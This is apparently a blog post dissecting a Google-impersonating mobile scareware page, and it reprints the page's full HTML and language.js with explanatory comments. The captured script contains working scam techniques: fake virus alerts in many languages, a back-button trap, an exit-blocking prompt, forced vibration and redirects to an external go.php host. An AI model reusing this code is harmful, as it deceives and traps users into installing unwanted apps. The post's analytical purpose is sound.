看完內文之後,第一時間反應是…關掉!我急著看影片
後來覺得有幾點還蠻有趣的
所以,我再度把它打開來研究
先觀察
- 網址(URL)是偽網址,讓人誤以為是Google給你的訊息。結尾的".xyz"域名也太不認真了。(也許是想kuso吧)
- 使用Google的圖片,原因和第 1 點相同
- 時間倒數,故意使人緊張。
- 手機開始會每一秒震動一次,讓你不注意也不行。(這蠻有趣的)
- 內文簡單來說,就是發現手機中有病毒,要你快點去下載APP。(簡中/繁中夾雜,看了就不高興)
這是恐嚇網頁,主要目的是要讓你去下載某個惡意程式,下載並執行之後理所當然地就中毒了
我故意下載看看,是一個APP(*.apk)
檔名我沒去記,因為名字是可以隨便取的
所以這個惡意程式還是得要安裝,並且要使用者給予權限
不過通常也沒人會去注意APP要求什麼權限啦
上網 GOOGLE,在今年5月就有新聞了
當時是會連到 Google play,下載某防毒軟體(我沒有說是像"CM Security"之類的)
我試著照它的流程走,會連到Google play的 SuperB Cleaner(Boost&Clean) 頁面
Google play基本上算安全,所以這個恐嚇網頁本質上仍是騙你下載,衝流量的
(不過上架 Google Play 不代表 APP 一定無害;而且按鈕導向的 go.php 要轉去哪裡是對方伺服器決定的,前面就出現過直接給 APK 的情況)
試著玩一下
先在桌機試看看,貼上URL看看
[http://s.system-online-service.xyz/imo/ansapp580061/2/index.htm?models=%2AUNKNOWN&isp=Android+6.0.1&a001=trk.googleplay&b001=trk.yahoo.xyz&c001=trk.loadingcontent.xyz&d001=trk.amazon.xyz]
OK,看來需要在手機上跑才看得到原始碼
在手機Chrome,使用view-source可以得到網頁原始碼
view-source:<url> # 可以得到網頁原始碼
原始碼為
<!--
  Captured source of the scare page (index.htm), split onto separate lines for reading;
  markup and script text are otherwise as captured.

  What the markup and inline scripts do:
    - present the page as "Google" (title, favicon, logo.png, googleplaylogo.png);
    - redirect unless the URL carries an `isp` parameter and window.orientation is defined;
    - print a device string taken from the query string into the headline;
    - point both call-to-action links at http://<c001 parameter>/go.php;
    - autoplay a looping alert sound;
    - push ten history entries and redirect to go.php when Back is pressed.
  The warning text, alert() dialogs, countdown and vibration are supplied by language.js.
-->
<html><head>
<script>
  // Query string without the leading "?"; it is re-appended to the redirects below.
  var suffixurl = (location.search.length > 0 ? location.search.substring(1) : "");

  // Returns query parameter `name` passed through decodeURI(), or '' when it is absent.
  // `name` goes into the RegExp unescaped and unanchored, so the first "<name>=" found
  // anywhere in location.search is the one that matches.
  function getURLParameter(name) {
    return decodeURI( (RegExp(name + '=' + '(.+?)(&|$)').exec(location.search)||[,null])[1] || '' );
  }

  // Gate 1: no `isp` parameter -> replace the location with index.htm plus the same query.
  // The typeof test can never be true, because getURLParameter() always returns a string.
  if(getURLParameter('isp') == "" || typeof getURLParameter('isp') == 'undefined') {
    document.location.replace("index.htm?" + suffixurl);
  }

  // Gate 2: window.orientation undefined -> same redirect.
  // NOTE(review): window.orientation is normally only defined by mobile browsers, which fits the
  // author's observation that the source could only be read on a phone. What index.htm returns
  // to a client that fails these gates is not shown on this page.
  if(typeof window.orientation == 'undefined') {
    document.location.replace("index.htm?" + suffixurl);
  }
</script>
<script>
  // Returns parameter `name`; when it is empty or contains "unknow" (case-insensitive) the
  // `replaceisp` parameter is used instead. The result is decodeURIComponent()-decoded and
  // "+" is turned into a space.
  function getURLExtParameter(name, replaceisp='isp'){
    var models = getURLParameter(name);
    if(!models || models.toLowerCase().indexOf("unknow") >= 0){
      models = getURLParameter(replaceisp);
    }
    if(models) models = decodeURIComponent(models).replace(/\+/g, ' ');
    return models;
  }
</script>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0,maximum-scale=1.0, user-scalable=no">
<!-- Brand impersonation: the tab title is "Google" and the favicon is a local logo11.png. -->
<title>Google</title>
<link rel="icon" href="logo11.png">
<style type="text/css">
  a { color: #585858; }
  body { background-color: #fff; color: #646464; margin: 0; line-height:150%; }
  h1 { color: #000; font-size: 1.4em; }
  .hidden { display: none; }
  html { -webkit-text-size-adjust: 100%; font-size: 125%; }
  .interstitial-wrapper { padding-top: 20px; box-sizing: border-box; font-size: 1em; margin: auto; max-width: 600px; width: 90%; }
  h1 { margin-top: 10px; }
  a { color: rgb(17,85,204); text-decoration: none; }
  /* #blink wraps the headline (#NO1): red text whose opacity cycles once per second. */
  #blink { color: #ff0000; padding-bottom: 2px; padding-top: 10px; -webkit-animation: blink 1s infinite; -moz-animation: blink 1s infinite; -ms-animation: blink 1s infinite; -o-animation: blink 1s infinite; animation: blink 1s infinite; }
  @-webkit-keyframes blink { 0% { opacity: 1.0; } 50% { opacity: 0.0; } 100% { opacity: 1.0; } }
  @-moz-keyframes blink { 0% { opacity: 1.0; } 50% { opacity: 0.0; } 100% { opacity: 1.0; } }
  /* The extra closing brace after the next rule is present in the captured source. */
  @-ms-keyframes blink { 0% { opacity: 1.0; } 50% { opacity: 0.0; } 100% { opacity: 1.0; } } }
  @-o-keyframes blink { 0% { opacity: 1.0; } 50% { opacity: 0.0; } 100% { opacity: 1.0; } }
  @keyframes blink { 0% { opacity: 1.0; } 50% { opacity: 0.0; } 100% { opacity: 1.0; } }
</style>
</head>
<!--
  translate() is not defined anywhere in the source shown, and language.js later assigns
  window.onload = countDown.
  NOTE(review): the ids/classes below (main-frame-error, interstitial-wrapper, jstcache) look like
  they were copied from a browser's built-in error page - presumably to appear native; confirm.
-->
<body onload="translate()" class="offline" style="font-family: Helvetica, sans-serif; font-size: 75%;">
<div id="main-frame-error" class="interstitial-wrapper">
  <div id="main-content">
    <image overflow="visible" width="150" height="53" src="logo.png"></image>
    <div id="today"></div>
    <div id="main-message" style="clear: both;">
      <!--
        The headline starts with a device string read from the URL and written with document.write(),
        unescaped. With the sample URL in this post (models=%2AUNKNOWN, isp=Android+6.0.1) the
        "unknow" fallback applies and the text becomes "Android 6.0.1". The page reads nothing
        from the device itself here; whoever builds the link chooses this text.
      -->
      <h1 id="headTxt2" style=""> <span id="headingtext"><script>document.write(getURLExtParameter('models', 'isp'))</script> <div id='blink'><div id="NO1"></div></div></span></h1>
      <div id="subhead" style="margin-bottom: 1px; color: black; font-weight: bold;"><div id="NO2"></div></div>
      <div id="bodytxt" style="">
        <image overflow="visible" width="100" height="104" src="404.png" style="float:right;"></image>
        <!-- #timer is filled by countDown() in language.js. -->
        <span style="font-size:18px;font-weight:bold;color:red;font-family:sans-serif;" id="timer"></span>
        <div id="successScan" style="margin-bottom:8px"></div>
        <div id="NO3"></div>
        <br>
      </div>
    </div>
  </div>
  <div id="details" class="" jstcache="0">
    <div jsselect="summary" jstcache="5">
      <span style="text-align:center;display:block;">
        <!-- Call-to-action button: label set by language.js, href set by the script further down.
             rel="noreferrer" keeps this page's URL out of the Referer header sent to the target. -->
        <a id="NO4" href="" style="box-sizing: border-box;padding:10px 15px;color:#fff;border-radius:3px;width: 100%;display: block;background: #0370ea; background: -moz-linear-gradient(top,#008dfd 0,#0370ea 100%); background: -webkit-gradient(linear,left top,left bottom,color-stop(0,#008dfd),color-stop(100%,#0370ea)); background: -webkit-linear-gradient(top,#008dfd 0,#0370ea 100%); background: -o-linear-gradient(top,#008dfd 0,#0370ea 100%); background: -ms-linear-gradient(top,#008dfd 0,#0370ea 100%); background: linear-gradient(top,#008dfd 0,#0370ea 100%);" rel="noreferrer"></a>
      </span>
    </div>
    <!-- Second link to the same target, shown as a Google Play logo image. -->
    <div style="text-align:center;margin:0 auto;margin-top:20px;"><a id="NO404" href="" rel="noreferrer"><img src="googleplaylogo.png" border="0"></a></div>
  </div>
</div>
<br>
<!-- Looping alert sound that starts by itself; pausemusic() in language.js empties this
     container 1400 ms after the script loads. Both sources are labelled audio/mpeg. -->
<div id="musicplace"><audio id="music" autoplay="autoplay" loop="loop"> <source src="alert.mp3" type="audio/mpeg"> <source src="alert.oga" type="audio/mpeg"> </audio> </div>
<!-- Both links go to http://<value of c001>/go.php. In the sample URL c001 is
     trk.loadingcontent.xyz, which matches the redirect the author reports after tapping the
     button. The a001/b001/d001 parameters are not read by any script shown here. -->
<script type="text/javascript">document.getElementById("NO4").href="http://"+getURLParameter('c001')+"/go.php";</script>
<script type="text/javascript">document.getElementById("NO404").href="http://"+getURLParameter('c001')+"/go.php";</script>
<script type="text/javascript" src="language.js"></script>
<script type="text/javascript">
  // Back-button trap: ten entries with a non-null state are pushed onto the history stack, so
  // pressing Back pops one of them and fires onpopstate, which replaces the page with the same
  // go.php URL as the button. Any exception is silently discarded by the empty catch.
  ! function () {
    var t;
    try {
      for (t = 0; 10 > t; ++t) history.pushState({}, "", "#");
      onpopstate = function (t) {
        t.state && location.replace("http://"+getURLParameter('c001')+"/go.php");
      }
    } catch (o) {}
  }();
</script>
</body></html>
可以看一下language.js
[http://s.system-online-service.xyz/imo/ansapp580061/2/language.js]
/*
 * language.js as captured from the scare page, split onto separate lines for reading;
 * statements and strings are otherwise unchanged.
 *
 * What it does:
 *   - changeLanguage(): fills the headline, text and button label in the browser's language;
 *   - showAlert(): shows an alert() dialog, installs a "leave page?" prompt and vibrates the phone;
 *   - countDown(): drives the on-page countdown;
 *   - pausemusic() / pausetime(): remove the alert sound and hide the countdown later on.
 *
 * Nothing in this file inspects the device: the virus counts, the threat name and the
 * countdown are all hard-coded.
 *
 * Four string literals contain a physical line break on the captured page (German and Spanish
 * NO2 text, Korean and default _showMessage text); they are reproduced as captured.
 *
 * NOTE(review): how much of this still works depends on the browser, e.g. whether custom
 * beforeunload text is displayed and whether vibrate() is honoured without a user gesture -
 * verify against the browser versions in scope.
 */

// Schedule, in ms after the script runs. The string form of setTimeout evaluates its argument as code.
setTimeout ('changeLanguage()',1);
setTimeout ('pausemusic()',1400);
setTimeout ('showAlert()',825);
setTimeout ('pausetime()',90000);

// Empties #musicplace, which removes the autoplaying <audio> element from the page.
function pausemusic(){
  document.getElementById('musicplace').innerHTML = '';
}

// Hides the countdown element.
function pausetime(){
  document.getElementById('timer').style.display = 'none';
}

// Writes the scare text into #NO1 (blinking headline), #NO2 (sub-headline), #NO3 (steps) and
// #NO4 (button label). The language is the first two characters of navigator.language
// (navigator.userLanguage when appName is not "Netscape"); any language without its own branch
// gets the English text. The counts differ per language - (22), (2), (3) or none - because they
// are literals, not scan results.
function changeLanguage() {
  var type=navigator.appName
  if (type=="Netscape"){
    var lang = navigator.language
  }
  else{
    var lang = navigator.userLanguage
  }
  var lang = lang.substr(0,2)
  if (lang == "zh"){
    document.getElementById('NO1').innerHTML = '您的手機發現 (22) 個病毒!';
    document.getElementById('NO2').innerHTML = '這些手機病毒即將損壞您的電池.為了您的設備安全,系統將永久關機.<br><br>';
    document.getElementById('NO3').innerHTML = '<strong>請立即按下列步驟清除病毒:</strong><br><strong>第一步:</strong> 點擊"刪除病毒",到Google Play下載官方免費殺毒APP.<br><strong>第二步:</strong> 打開APP,清除電池病毒並恢復系統運行速度.';
    document.getElementById('NO4').innerHTML = '刪除病毒';
  }
  else if (lang == "ms"){
    document.getElementById('NO1').innerHTML = 'Amaran!';
    document.getElementById('NO2').innerHTML = 'Telefon anda mempunyai (2) Virus dan baterinya telah rosak!<br><br>';
    document.getElementById('NO3').innerHTML = '<strong>Bagaimana membaiki bateri anda:</strong><br><strong>Langkah 1:</strong>Ketik butang di bawah dan pergi ke Google Play Store untuk memasang aplikasi alih keluar virus dengan percuma.<br><strong>Langkah 2:</strong>Mengalih keluar semua virus dan membaiki bateri anda.';
    document.getElementById('NO4').innerHTML = 'Alih Keluar Virus Sekarang';
  }
  else if (lang == "de"){
    document.getElementById('NO1').innerHTML = 'Ihre Batterie ist stark beschädigt!';
    document.getElementById('NO2').innerHTML = 'Wir haben einen Virus auf Ihrem Telefon gefunden! 
<br>Um einen Komplettverlust zu vermeiden, Muss die Batterie jetzt repariert werden.<br><br>';
    document.getElementById('NO3').innerHTML = '<strong>Wie Sie Ihren Akku reparieren:</strong><br><strong>Schritt 1:</strong>Die untenstehende Schaltfläche antippen & auf Google Play Store gehen, um die kostenlose App zu installieren, die zur Virenentfernung empfohlen wird.<br><strong>Schritt 2:</strong>Wöchentlich auf Viren prüfen, Um sicherzustellen, Dass Ihr Telefon virenfrei ist.';
    document.getElementById('NO4').innerHTML = 'Den Akkuvirus jetzt entfernen';
  }
  else if (lang == "it"){
    document.getElementById('NO1').innerHTML = 'Avviso di sistema!';
    document.getElementById('NO2').innerHTML = 'Sono stati rilevati (2) virus e la batteria è stata infettata e danneggiata.<br><br>';
    document.getElementById('NO3').innerHTML = "<strong>Come riparare la batteria:</strong><br><strong>Fase 1:</strong>tocca il pulsante sottostante per accedere al Google Play Store e installare gratuitamente l'applicazione consigliata per la rimozione dei virus.<br><strong>Fase 2:</strong>esegui l'applicazione per rimuovere tutti i virus e riparare la batteria.<br><strong>Fase 3:</strong>Mantieni l'app per almeno 3 giorni per eliminare completamente i virus e prevenire ulteriori attacchi.";
    document.getElementById('NO4').innerHTML = 'Rimuovi i virus della batteria ora';
  }
  else if (lang == "es"){
    document.getElementById('NO1').innerHTML = 'El teléfono dispone de (3) Virus!';
    // The threat name in the next string is a fixed literal.
    document.getElementById('NO2').innerHTML = 'Amenaza de: Backdoor.Battery.OS.Obad.a/.b/.f. 
Si no eliminas los virus ahora, ocasionará más daños graves a tu móvil.<br><br>';
    document.getElementById('NO3').innerHTML = '<strong>Cómo arreglar tu teléfono:</strong><br><strong>Paso 1:</strong>Pulse el botón de abajo y vaya a Google Play para instalar de forma gratuita la aplicación recomendada de eliminación de virus.<br><strong>Paso 2:</strong>Abra la aplicacion para arreglar tu teléfono.<br><strong>Paso 3:</strong>mantén la app mínimo 3 días para borrar completamente todos los virus y prevenir ataques posteriores.';
    document.getElementById('NO4').innerHTML = 'Eliminar Virus';
  }
  else if (lang == "tr"){
    document.getElementById('NO1').innerHTML = 'Sistem Uyarısı!';
    document.getElementById('NO2').innerHTML = 'cihazınızda (2) virüs bulundu ve pile de bulaşmış ve hasar görmüş!<br><br>';
    document.getElementById('NO3').innerHTML = "<strong>Pilinizi nasıl onaracaksınız:</strong><br><strong>Adım 1:</strong>Aşağıdaki düğmeye dokunun ve önerilen virüs silme uygulamasını Google Play Store'dan ücretsiz olarak kurun.<br><strong>Adım 2:</strong>Tüm virüsleri silmek ve pilinizi onarmak için uygulamayı çalıştırın.";
    document.getElementById('NO4').innerHTML = 'ŞİMDİ HIZLI REPAIR';
  }
  else if (lang == "ar"){
    document.getElementById('NO1').innerHTML = 'تحذير ';
    document.getElementById('NO2').innerHTML = 'جهاز لديك مصاب بفيروس والبطارية تالفة<br><br>';
    document.getElementById('NO3').innerHTML = "اضغط على الزر أدناه وانتقل إلى Google Play لتثبيت التطبيق الموصى به لإزالة الفيروسات مجانا<br><br>";
    document.getElementById('NO4').innerHTML = 'إزالة فيروس البطارية الآن';
  }
  else if (lang == "ja"){
    document.getElementById('NO1').innerHTML = 'システム警告!';
    document.getElementById('NO2').innerHTML = '(22)個のウイルスが検出され、バッテリーが感染して破損していることが分かりました。<br><br>';
    document.getElementById('NO3').innerHTML = '<strong>バッテリーの修複方法:</strong><br><strong>ステップ1:</strong> 下のボタンをタップしてGoogle Playストアに移動します。おすすめのウイルス削除アプリを無料でインストールします。<br><strong>ステップ2:</strong> アプリを起動させ、全てのウイルスを削除してバッテリーを修復します。';
    document.getElementById('NO4').innerHTML = 'ウイルスを除去';
  }
  else if (lang == "ko"){
    document.getElementById('NO1').innerHTML = '시스템 경고!';
    document.getElementById('NO2').innerHTML = '귀하의 휴대 전화는 (2) 바이러스가있다! 에서 검출되었으며 배터리가 감염되었고 손상되었습니다.<br><br>';
    document.getElementById('NO3').innerHTML = '<strong>배터리를 복구하는 방법:</strong> <br><strong>1 단계: </strong> 아래 버튼을 누르고 Google Play Store로 이동하여 무료로 권장하는 바이러스 제거 앱을 설치합니다.<br><strong>2 단계: </strong>앱을 실행하여 모든 바이러스를 제거하고 배터리를 복구합니다.<br><strong>3 단계: </strong>모든 바이러스를 완전히 정리하고 추가 공격을 방지하기 위해 최소 3일 동안 앱을 유지하십시오.';
    document.getElementById('NO4').innerHTML = '바이러스를 제거';
  }
  else{
    document.getElementById('NO1').innerHTML = 'Warning! (22) Virus Detected!';
    document.getElementById('NO2').innerHTML = 'If you do not remove the virus from your device immediately, your battery will be infected and your device will be shut down permanently!<br><br>';
    document.getElementById('NO3').innerHTML = '<strong>Here is what you should do immediately:</strong><br><br><strong>Step 1:</strong> Tap the "Remove Battery Virus" button below to install official virus removal App from Google play for Free.<br><strong>Step 2:</strong> Run the app to remove all virus & repair your battery.';
    document.getElementById('NO4').innerHTML = 'Remove Battery Virus';
  }
}

// Runs 825 ms after the script loads. In every language branch the sequence is the same:
//   1. alert() with a warning (a blocking dialog the user has to dismiss);
//   2. _showMessage(window, text) registers text as the page's "leave this page?" message;
//   3. _performEvent(navigator) starts the vibration pattern.
function showAlert(){
  var type=navigator.appName
  if (type=="Netscape"){
    var lang = navigator.language
  }
  else{
    var lang = navigator.userLanguage
  }
  var lang = lang.substr(0,2)
  if (lang == "zh"){
    alert("警告!您的手機發現病毒!\n\n病毒即將損壞您的電池。\n\n請按照說明刪除該病毒");
    _showMessage(window, "****************\n\n 警告! \n\n 離開此頁面後果自負! \n\n ****************");
    _performEvent(navigator);
  }
  else if (lang == "ja"){
    alert("システム警告!");
    _showMessage(window, "****************\n\n手順に従い攜帯を修復してください。\n\n ウィンドウを閉じないでください。\n\n 閉じる場合は自己責任となります! \n\n ****************");
    _performEvent(navigator);
  }
  else if (lang == "ko"){
    alert("시스템 경고!");
    _showMessage(window, "****************\n\n 휴대폰을 수정하기 위해 지침을 계속합니다. 
이 창을 닫지 마십시오.\n\n 자체 위험에서 종료.****************");
    _performEvent(navigator);
  }
  else if (lang == "ms"){
    alert("Amaran!");
    _showMessage(window, "****************\n\n Amaran! \n\n Jika anda keluar daripada aplikasi,\n\n anda perlu menanggung semua risiko. \n\n ****************");
    _performEvent(navigator);
  }
  else if (lang == "de"){
    alert("System warnung!");
    _showMessage(window, "****************\n\n Systemwarnung! \n\n Fahren Sie mit den Anweisungen fort, um das Telefon zu reparieren. Schließen Sie dieses Fenster nicht.\n\n Beenden auf eigene Gefahr.\n\n****************");
    _performEvent(navigator);
  }
  else if (lang == "it"){
    alert("Avviso di sistema!");
    _showMessage(window, "****************Avviso di sistema! \n\n Segui le istruzioni per riparare il telefono. Non chiudere questa finestra.\n\n Esci a tuo rischio e pericolo!****************");
    _performEvent(navigator);
  }
  else if (lang == "es"){
    alert("Advertencia!");
    _showMessage(window, "****************\n\n Advertencia! \n\n Continua con las instrucciones para arregular tu telefono. \n\n No cierres la ventana.\n\n****************");
    _performEvent(navigator);
  }
  else if (lang == "tr"){
    alert("Sistem Uyarısı!");
    _showMessage(window, "****************\n\n Sistem Uyarısı!\n\n Telefonu düzeltmek için talimatları izleyin.\n\n Bu pencereyi kapatmayın.\n\n Çıkmanın riski size aittir! \n\n ****************");
    _performEvent(navigator);
  }
  else if (lang == "ar"){
    alert("تحذير! ");
    _showMessage(window, "****************\n\n تحذير! \n\n يرجى مواصلة التعليمات لإصلاح الهاتف. لا تغلق هذه النافذة \n\n ****************");
    _performEvent(navigator);
  }
  else {
    alert("WARNING! Virus detected! \n\n Please follow the instructions to remove the Virus.");
    _showMessage(window, "****************\n\nWARNING! Virus detected!\n\n Please follow the instructions to remove the Virus! 
\n\n Exit at your own risk!\n\n ****************");
    _performEvent(navigator);
  }
}

// Timer script. The countdown is cosmetic: the first tick shows "01 : 28", it reschedules itself
// every second, and at "00 : 00" it only cancels the next tick - nothing else is triggered.
// pausetime() hides the element 90 s after load. `time` and `SD` are implicit globals.
var sec = 29; // starting seconds (decremented before the first display)
var min = 01; // starting minutes; 01 is a legacy octal literal equal to 1
function countDown() {
  sec--;
  if (sec == -01) {
    // Seconds rolled past zero: wrap to 59 and take one minute off.
    sec = 59;
    min = min - 1;
  } else {
    min = min;
  }
  // Zero-pad; sec becomes a string here and is coerced back to a number by sec-- on the next tick.
  if (sec<=9) { sec = "0" + sec; }
  time = (min<=9 ? "0" + min : min) + " : " + sec;
  if (document.getElementById) { document.getElementById('timer').innerHTML = time; }
  SD=window.setTimeout("countDown();", 1000);
  // Loose equality: numeric min 0 compares equal to '00'.
  if (min == '00' && sec == '00') { sec = "00"; window.clearTimeout(SD); }
}
// Start on page load; this assignment replaces any handler set through <body onload="...">.
window.onload = countDown;

// Installs the exit prompt. e is the window, t the message text.
//   - n() returns the delay (ms) of a <meta http-equiv="refresh"> if the page has one, else false;
//   - document.onclick sets a flag when the click target is an <a> element (or on any error);
//   - e.onbeforeunload returns t, which asks the browser to confirm leaving the page, except when
//     an <a> was clicked, e._clicked is set, or the unload falls within 500 ms of the meta-refresh
//     delay. Tapping the call-to-action link therefore leaves without a prompt, while closing the
//     tab or navigating elsewhere is challenged.
// e._clicked is not assigned anywhere in the code shown on this page.
function _showMessage(e, t){
  function n(){for(var e=document.getElementsByTagName("meta"),t=0;t<e.length;++t)if(-1!==e[t].httpEquiv.search(/refresh/i)){var n=e[t].content.match(/\d+/);if(n)return 1e3*parseInt(n[0])}return!1}var a,r=(new Date).valueOf();document.onclick=function(e){try{var t=e?e.target:event.srcElement;"a"===t.tagName.toLowerCase()&&(a=!0)}catch(n){a=!0}},e.onbeforeunload=function(c){var o=n();if(o!==!1){var i=(new Date).valueOf()-r;if(Math.abs(i-o)<500)return}return a||e._clicked?void 0:t}
}

// Vibrates the device. e is the navigator object; the first available of vibrate /
// webkitVibrate / mozVibrate / msVibrate is called with seven 666 ms pulses separated by 333 ms
// pauses (about 7 s in total) - the once-a-second buzzing the author noticed.
// Errors are swallowed, so a browser without the API is simply skipped.
function _performEvent(e){
  try{var a=e.vibrate||e.webkitVibrate||e.mozVibrate||e.msVibrate;a&&a.call(e,[666,333,666,333,666,333,666,333,666,333,666,333,666,333])}catch(t){}
}
OK,其實我花這麼久時間,只是想找手機震動的方法是什麼而已XD
有興趣的人可以去查查 navigator.vibrate
對了,如果點button之後
會導向URL [http://trk.loadingcontent.xyz/go.php]
內容應該是再導頁到其它URL
@update 2016/12/16
昨天跳出一個新頁面出來時,本能反應要拉下來、關掉時,看見
呵呵,google開始擋了
然後,沒過多久就又看見全新風格的頁面
只是這次沒有掛 google名字XD
忘了截圖,SAD